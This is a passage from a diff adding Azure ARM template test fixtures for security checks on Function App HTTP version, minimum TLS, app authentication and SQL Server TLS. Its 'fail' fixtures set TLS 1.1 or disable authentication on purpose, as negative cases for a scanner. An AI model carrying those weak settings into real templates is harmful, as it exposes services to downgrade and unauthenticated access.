"minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ], + "outputs": { + "proxyKey": { + "type": "object", + "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]" + } + } +} + diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass.json new file mode 100644 index 00000000000..69b2c86f385 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass.json @@ -0,0 +1,374 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "vaultName": { + "type": "string", + "metadata": { + "description": "The name of the key vault to be created." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The name of the key to be created." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of the resources" + } + }, + "skuName": { + "type": "string", + "defaultValue": "standard", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The SKU of the vault to be created." + } + }, + "keyType": { + "type": "string", + "defaultValue": "RSA", + "allowedValues": [ + "EC", + "EC-HSM", + "RSA", + "RSA-HSM" + ], + "metadata": { + "description": "The JsonWebKeyType of the key to be created." + } + }, + "keyOps": { + "type": "array", + "defaultValue": [], + "metadata": { + "description": "The permitted JSON web key operations of the key to be created." + } + }, + "keySize": { + "type": "int", + "defaultValue": 2048, + "metadata": { + "description": "The size in bits of the key to be created." + } + }, + "curveName": { + "type": "string", + "defaultValue": "", + "allowedValues": [ + "", + "P-256", + "P-256K", + "P-384", + "P-521" + ], + "metadata": { + "description": "The JsonWebKeyCurveName of the key to be created." + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-09-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": true, + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ], + "outputs": { + "proxyKey": { + "type": "object", + "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]" + } + } +} + diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass2.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass2.json new file mode 100644 index 00000000000..0871576b6cc --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass2.json @@ -0,0 +1,373 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "vaultName": { + "type": "string", + "metadata": { + "description": "The name of the key vault to be created." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The name of the key to be created." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of the resources" + } + }, + "skuName": { + "type": "string", + "defaultValue": "standard", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The SKU of the vault to be created." + } + }, + "keyType": { + "type": "string", + "defaultValue": "RSA", + "allowedValues": [ + "EC", + "EC-HSM", + "RSA-HSM" + ], + "metadata": { + "description": "The JsonWebKeyType of the key to be created." + } + }, + "keyOps": { + "type": "array", + "defaultValue": [], + "metadata": { + "description": "The permitted JSON web key operations of the key to be created." + } + }, + "keySize": { + "type": "int", + "defaultValue": 2048, + "metadata": { + "description": "The size in bits of the key to be created." + } + }, + "curveName": { + "type": "string", + "defaultValue": "", + "allowedValues": [ + "", + "P-256", + "P-256K", + "P-384", + "P-521" + ], + "metadata": { + "description": "The JsonWebKeyCurveName of the key to be created." + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "pass2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": true, + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ], + "outputs": { + "proxyKey": { + "type": "object", + "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]" + } + } +} + diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail.json new file mode 100644 index 00000000000..4a5965c74df --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2021-02-01", + "name": "fail", + "location": "[resourceGroup().location]", + "properties": { + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]", + "siteConfig": { + "minTlsVersion": "1.1" + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail2.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail2.json new file mode 100644 index 00000000000..c74057282fe --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail2.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2021-02-01", + "name": "fail2", + "location": "[resourceGroup().location]", + "properties": { + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]", + "siteConfig": { + "minTlsVersion": "1.1" + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass.json new file mode 100644 index 00000000000..0dbbafaebb0 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2021-02-01", + "name": "pass", + "location": "[resourceGroup().location]", + "properties": { + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]", + "siteConfig": { + "minTlsVersion": "1.2" + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass2.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass2.json new file mode 100644 index 00000000000..b81f1b491f8 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass2.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2021-02-01", + "name": "pass2", + "location": "[resourceGroup().location]", + "properties": { + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]", + "siteConfig": { + "minTlsVersion": 1.2 + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass3.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass3.json new file mode 100644 index 00000000000..a21270870cc --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass3.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2021-02-01", + "name": "pass3", + "location": "[resourceGroup().location]", + "properties": { + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]", + "siteConfig": { + "minTlsVersion": "1.2" + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass4.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass4.json new file mode 100644 index 00000000000..93359bab29f --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass4.json @@ -0,0 +1,19 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2021-02-01", + "name": "pass4", + "location": "[resourceGroup().location]", + "kind": "functionapp,linux", + "properties": { + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]", + "siteConfig": { + "minTlsVersion": 1.2 + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail.json b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail.json new file mode 100644 index 00000000000..ef062880598 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites/config", + "apiVersion": "2021-02-01", + "name": "fail", + "properties": { + "httpSettings": { + "forwardProxy": { + "convention": "Custom" + } + } + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail2.json b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail2.json new file mode 100644 index 00000000000..f4c0e45858a --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail2.json @@ -0,0 +1,21 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites/config", + "apiVersion": "2021-02-01", + "name": "fail2", + "properties": { + "httpSettings": { + "forwardProxy": { + "convention": "Custom" + } + }, + "platform": { + "enabled": false + } + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass.json b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass.json new file mode 100644 index 00000000000..36a15504964 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass.json @@ -0,0 +1,21 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites/config", + "apiVersion": "2021-02-01", + "name": "pass", + "properties": { + "httpSettings": { + "forwardProxy": { + "convention": "Custom" + } + }, + "platform": { + "enabled": true + } + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/fail.json b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/fail.json new file mode 100644 index 00000000000..34dcc4540d4 --- /dev/null +++ b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/fail.json @@ -0,0 +1,246 @@ +{ + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "apiVersion": { + "type": "string", + "defaultValue": "2021-05-01" + }, + "administratorLogin": { + "type": "string" + }, + "administratorLoginPassword": { + "type": "securestring" + }, + "location": { + "type": "string" + }, + "serverName": { + "type": "string" + }, + "serverEdition": { + "type": "string" + }, + "vCores": { + "type": "int", + "defaultValue": 4 + }, + "storageSizeGB": { + "type": "int" + }, + "haEnabled": { + "type": "string", + "defaultValue": "Disabled" + }, + "availabilityZone": { + "type": "string", + "defaultValue": "" + }, + "standbyAvailabilityZone": { + "type": "string" + }, + "version": { + "type": "string" + }, + "tags": { + "type": "object", + "defaultValue": {} + }, + "firewallRules": { + "type": "object", + "defaultValue": {} + }, + "backupRetentionDays": { + "type": "int" + }, + "geoRedundantBackup": { + "type": "string" + }, + "vmName": { + "type": "string", + "defaultValue": "Standard_B1ms" + }, + "storageIops": { + "type": "int" + }, + "storageAutogrow": { + "type": "string", + "defaultValue": "Enabled" + }, + "autoIoScaling": { + "type": "string", + "defaultValue": "Disabled" + }, + "identityData": { + "type": "object", + "defaultValue": {} + }, + "dataEncryptionData": { + "type": "object", + "defaultValue": {} + }, + "serverParameters": { + "type": "array", + "defaultValue": [] + }, + "aadEnabled": { + "type": "bool", + "defaultValue": false + }, + "aadData": { + "type": "object", + "defaultValue": {} + }, + "guid": { + "type": "string", + "defaultValue": "[newGuid()]" + }, + "network": { + "type": "object", + "defaultValue": {} + }, + "firewallRulesAPIVersion": { + "type": "string", + "defaultValue": "2022-01-01" + } + }, + "variables": { + "api": "[parameters('apiVersion')]", + "firewallRules": "[parameters('firewallRules').rules]", + "serverParameters": "[parameters('serverParameters')]" + }, + "resources": [ + { + "type": "Microsoft.Sql/servers", + "apiVersion": "2023-05-01-preview", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "identity": { + "type": "string", + "userAssignedIdentities": { + "{customized property}": {} + } + }, + "properties": { + "administratorLogin": "string", + "administratorLoginPassword": "string", + "administrators": { + "administratorType": "ActiveDirectory", + "azureADOnlyAuthentication": "bool", + "login": "string", + "principalType": "string", + "sid": "string", + "tenantId": "string" + }, + "federatedClientId": "string", + "isIPv6Enabled": "string", + "keyId": "string", + "minimalTlsVersion": "1.1", + "primaryUserAssignedIdentityId": "string", + "publicNetworkAccess": "string", + "restrictOutboundNetworkAccess": "string", + "version": "string" + } + }, + { + "condition": "[greater(length(variables('firewallRules')), 0)]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]", + "copy": { + "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]", + "mode": "Serial", + "name": "firewallRulesIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules", + "name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]", + "apiVersion": "[parameters('firewallRulesAPIVersion')]", + "properties": { + "StartIpAddress": "[variables('firewallRules')[copyIndex()].startIPAddress]", + "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]" + } + } + ] + } + } + }, + { + "condition": "[parameters('aadEnabled')]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('addAdmins-', parameters('guid'))]", + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/administrators", + "name": "[concat(parameters('serverName'),'/ActiveDirectory')]", + "apiVersion": "[variables('api')]", + "properties": { + "administratorType": "[parameters('aadData').administratorType]", + "identityResourceId": "[parameters('aadData').identityResourceId]", + "login": "[parameters('aadData').login]", + "sid": "[parameters('aadData').sid]", + "tenantId": "[parameters('aadData').tenantId]" + } + } + ] + } + } + }, + { + "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "copy": { + "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]", + "mode": "serial", + "name": "serverParametersIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]", + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/configurations", + "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]", + "apiVersion": "[variables('api')]", + "properties": { + "value": "[variables('serverParameters')[copyIndex()].value]", + "source": "[variables('serverParameters')[copyIndex()].source]" + } + } + ] + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/pass.json b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/pass.json new file mode 100644 index 00000000000..5244f95722e --- /dev/null +++ b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/pass.json @@ -0,0 +1,246 @@ +{ + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "apiVersion": { + "type": "string", + "defaultValue": "2021-05-01" + }, + "administratorLogin": { + "type": "string" + }, + 